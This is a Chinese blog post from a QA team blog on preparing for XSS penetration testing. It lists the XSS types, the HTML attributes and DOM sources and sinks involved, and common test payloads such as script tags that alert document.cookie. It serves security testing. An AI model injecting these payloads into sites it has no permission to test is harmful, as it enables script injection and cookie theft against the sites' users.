注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

网易杭州 QA Team

务实 专注 分享 做有态度的QA

 
 
 
 
 

日志

 
 

XSS(Cross-Site Scripting)渗透测试之准备工作  

来自caoyingspace   2012-07-02 10:30:43|  分类: 安全测试 |举报 |字号 订阅

  下载LOFTER 我的照片书  |

         对于XSS好多人都以为弹个框框有什么用呢?是的,弹个框框没有用。但通过弹框框就可以确定这个地方有严重的XSS,而你的技术好则可以通过XSS做很多事情。只有想不到,没有做不到----------这就是XSS的特点。

 

XSS影响面最广的Web安全漏洞。

§攻击者通过向URL或其他提交内容插入脚本,来实现客户端脚本执行的目的。

§可分为三种类型:反射、存储和DOM

§流行性:极为广泛;危害性:中等

 

一、HTML常用代码属性

XSS发起的基础就是构造有效的代码从而发起攻击,所以有必要对HTML常用的代码属性进行了解。

标签

属性

a

href;name;超链接的起始或目的位置

base

href;base元素必须出现在文档的head

body

onblur;onfocus;onload;onunload;与很多标签组合产生属性

br

size

embed

src

iframe

src;broder

hr

size;width;color

frame

src

img

src;style

input

onclick;type(src)

isindex

onerror;src

link

src

select

onchange

table

broder;width;height;color;background

textarea

style

关于XSS问题涉及到的CSS

 

import

url

expression

 

background-image

 

 

 

二、DOM类型以及背景

DOM是一种与浏览器、平台、语言无关的接口,使得你可以访问页面的其他组件。DOM中也使用到大量的JS脚本,而DOM的功能比普通的HTML语言更强大,所以这种类型的XSS似乎更严重。

“输入”相关操作:

document.url

document.urlunencoded

document.referrer

window.location

 

对应“输出”、“提取”相关操作:

document.write

document.writeln

document.body.innerHtml=

document.forms[0].action=

document.attachEvent

document.create

document.execCommand

document.body

window.attachEvent

document.location=

document.location.hostname=

document.location.replace

document.location.assign

window.navigate

document.open

window.open

window.location.href=

eval()

window.execScript

window.setInterval

window.setTimeout

 

三、常用的XSS测试语句

'><script>alert(document.cookie)</script>

='><script>alert(document.cookie)</script>

<script>alert(document.cookie)</script>

<script>alert(vulnerable)</script>

%3Cscript%3Ealert('XSS')%3C/script%3E

<script>alert('XSS')</script>

<img src="javascript:alert('XSS')">

<script>alert('Vulnerable');</script>

<script>alert('Vulnerable')</script>

"><script>alert('Vulnerable')</script>

<IMG SRC="javascript:alert('XSS');">

<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>

<BODY BACKGROUND="javascript:alert('XSS')">

<BODY ONLOAD=alert('XSS')>

<IMG DYNSRC="javascript:alert('XSS')">

  评论这张
 
阅读(653)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016